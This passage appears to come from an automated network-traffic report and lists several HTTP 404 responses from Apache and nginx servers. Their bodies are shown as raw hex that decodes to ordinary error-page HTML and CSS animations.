7d 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 6c 65 66 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 31 35 30 70 78 20 31 35 36 70 78 3b 0a 7d 0a 0a 2e 72 69 67 
68 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 33 31 30 70 78 20 31 35 30 70 78 3b 0a 7d 0a 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 73 63 61 6c 65 73 7b 0a 20 20 66 72 6f 6d 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 30 2e 39 38 29 7d 0a 20 20 74 6f 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 29 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 74 65 70 61 6f 7b 0a 20 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74 65 28 30 64 65 67 29 7d 0a 20 20 35 30 25 20 2c 20 36 30 25 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Sep 2024 11:54:45 GMTServer: ApacheContent-Length: 13840Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 6c 65 66 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 31 35 30 70 78 20 31 35 36 70 78 3b 0a 7d 0a 0a 2e 72 69 67 
68 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 33 31 30 70 78 20 31 35 30 70 78 3b 0a 7d 0a 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 73 63 61 6c 65 73 7b 0a 20 20 66 72 6f 6d 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 30 2e 39 38 29 7d 0a 20 20 74 6f 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 29 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 74 65 70 61 6f 7b 0a 20 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74 65 28 30 64 65 67 29 7d 0a 20 20 35 30 25 20 2c 20 36 30 25 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Sep 2024 11:54:47 GMTServer: ApacheContent-Length: 13840Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 6c 65 66 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 31 35 30 70 78 20 31 35 36 70 78 3b 0a 7d 0a 0a 2e 72 69 67 
68 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 33 31 30 70 78 20 31 35 30 70 78 3b 0a 7d 0a 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 73 63 61 6c 65 73 7b 0a 20 20 66 72 6f 6d 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 30 2e 39 38 29 7d 0a 20 20 74 6f 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 29 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 74 65 70 61 6f 7b 0a 20 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74 65 28 30 64 65 67 29 7d 0a 20 20 35 30 25 20 2c 20 36 30 25 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Sep 2024 11:54:50 GMTServer: ApacheContent-Length: 13840Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 6c 65 66 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 31 35 30 70 78 20 31 35 36 70 78 3b 0a 7d 0a 
0a 2e 72 69 67 68 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 33 31 30 70 78 20 31 35 30 70 78 3b 0a 7d 0a 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 73 63 61 6c 65 73 7b 0a 20 20 66 72 6f 6d 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 30 2e 39 38 29 7d 0a 20 20 74 6f 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 29 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 74 65 70 61 6f 7b 0a 20 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74 65 28 30 64 65 67 29 7d 0a 20 20 35 30 25 20 2c 20 36 30 25 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 03 Sep 2024 11:55:10 GMTContent-Type: text/htmlContent-Length: 3971Connection: closeETag: "6526681e-f83"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 
20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 03 Sep 2024 11:55:12 GMTContent-Type: text/htmlContent-Length: 3971Connection: closeETag: "6526681e-f83"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 
20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 03 Sep 2024 11:55:15 GMTContent-Type: text/htmlContent-Length: 3971Connection: closeETag: "6526681e-f83"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 
20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
